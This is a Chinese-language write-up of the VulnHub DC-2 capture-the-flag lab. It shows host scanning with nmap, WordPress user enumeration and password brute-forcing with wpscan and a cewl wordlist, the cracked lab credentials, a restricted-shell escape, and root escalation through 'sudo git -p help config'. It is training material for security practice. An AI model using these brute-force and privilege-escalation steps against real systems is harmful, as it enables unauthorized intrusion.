下載地址:https://www.vulnhub.com/entry/dc-2,311/
主機發現
端口掃描 nmap -v -sV -A -p- 192.168.44.147
訪問80端口失敗,顯示無法訪問該網站
猜測是沒有做域名解析,需要在本地的hosts文件內手動進行域名綁定
編輯hosts文件,添加域名解析
如果保存的時候提示權限不足,右擊 屬性 安全 編輯當前用戶的權限 給予修改和保存權限就行
然後訪問80端口,一看就是個wordpress站點
登陸成功之後,發現第一個flag
根據提示,需要使用cewl生產字典用來爆破
首先先使用wpsan掃描器枚舉出該網站的用戶名
wpscan --url http://dc-2 -e u vp
使用cewl生成字典
vi shy.txt
cewl http://dc-2 -w shy.txt
利用wpscan枚舉的用戶名和cewl生成的密碼字典進行爆破,可以使用burpsuite也可以使用wpscan進行爆破
這裏爲了方便使用wpscan進行爆破吧
wpscan --url http://dc-2 -e u -P /shy/shy.txt
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
使用Jerry賬號登陸,發現第二個flag,根據提示可以使用wordpress的exp或者還有別的方法
根據得到的賬號和密碼,還有之前掃描發現的7744端口,嘗試登陸,tom可登陸成功
cat命令無法使用,使用vi flag3.txt查看flag3.txt的內容
根據提示,需要切換到Jerry用戶,但是大部分命令無法執行,需要繞過受限shell
在home/jerry目錄下,找到第四個flag,根據提示需要使用git提權
sudo -l
git提權
sudo git -p help config
!/bin/sh